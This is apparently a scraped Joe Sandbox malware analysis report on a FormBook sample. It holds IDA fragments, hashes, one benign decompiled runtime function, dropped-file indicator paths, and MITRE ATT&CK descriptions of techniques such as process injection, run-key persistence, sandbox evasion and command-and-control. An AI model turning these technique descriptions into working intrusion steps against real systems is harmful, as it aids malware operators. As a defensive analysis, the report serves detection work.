Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89cca1b7d44d5ffad650767c281e107f0070df98cb54ad9fe95c1dd4fb7681f6
Instruction ID: 61769ee055ce1b8e1ebe6d807476120e2595bd064f01cadfc749546744aac86e
Opcode Fuzzy Hash: 89cca1b7d44d5ffad650767c281e107f0070df98cb54ad9fe95c1dd4fb7681f6
Instruction Fuzzy Hash: 32900266221054061255E95D060451B0885A7DA391391C425F1407590CC76188757761

Uniqueness

Uniqueness Score: -1.00%

Function 03709520 Relevance: .0, Instructions: 4COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d2a416999fceebf1dfb53b4a8a60bce1ba63952d4df0d07ab39de6ffb29a2d8c
Instruction ID: a565de1de12ea8fcb3fb7e8d4a89085ce459f8659660a1872ec1e2948320352d
Opcode Fuzzy Hash: d2a416999fceebf1dfb53b4a8a60bce1ba63952d4df0d07ab39de6ffb29a2d8c
Instruction Fuzzy Hash: 5A9002E2201194965610E65D8404B1A494597E4241B51C426E1045560CC6658861B575

Uniqueness

Uniqueness Score: -1.00%

Function 037095F0 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34dd9e768b61b9f3d0c8c0deb923ad3074af5f0047c9e7dd2468c271b0590c21
Instruction ID: 72e64d5d759b04992894d49f438fc6a48d19d4a98d925c9d343da6d78e328953
Opcode Fuzzy Hash: 34dd9e768b61b9f3d0c8c0deb923ad3074af5f0047c9e7dd2468c271b0590c21
Instruction Fuzzy Hash: CD90027220105C06E214A55D4804696044597D4341F51C421A6015655E97A588A17571

Uniqueness

Uniqueness Score: -1.00%

Function 03709670 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction ID: f52430ee89f0dc0f1961822a52d0ccbc3c0b74138e45c61f08d6809d9c67cd20
Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 0375FDDA Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E0375FDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E0370CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E03755720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E03755720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x0375fdda
0x0375fde2
0x0375fde5
0x0375fdec
0x0375fdfa
0x0375fdff
0x0375fe0a
0x0375fe0f
0x0375fe17
0x0375fe1e
0x0375fe19
0x0375fe19
0x0375fe19
0x0375fe20
0x0375fe21
0x0375fe22
0x0375fe25
0x0375fe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0375FDFA

Strings

RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 0375FE01
RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 0375FE2B

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 9e5e6f0a230303ab611148bbb2ac00dadfa5fb1a034aa2fc7aa6941d889b3bf5
Instruction ID: b66bbbc5c7bfa2bc336b51d06531c702ff0377fee1a58746254c24e206f1284f
Opcode Fuzzy Hash: 9e5e6f0a230303ab611148bbb2ac00dadfa5fb1a034aa2fc7aa6941d889b3bf5
Instruction Fuzzy Hash: 87F02B76240601BFE6259A45DC06F63BFAAEB45730F240718FA285A1D1DAA3F87097F0

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 1a#U00bb.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: FormBook

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Libraries\Djfypqyfx.exe

C:\Users\Public\Libraries\Djfypqyfx.exe:Zone.Identifier

C:\Users\Public\Libraries\xfyqpyfjD.url

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\Djfypqyfxwyivtfoakxovbbaompeayl[1]

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Windows Analysis Report
1a#U00bb.exe

Function 03709A50 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 03709A20 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 03709950 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 03709910 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Function 037099A0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 03709860 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Function 03709840 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON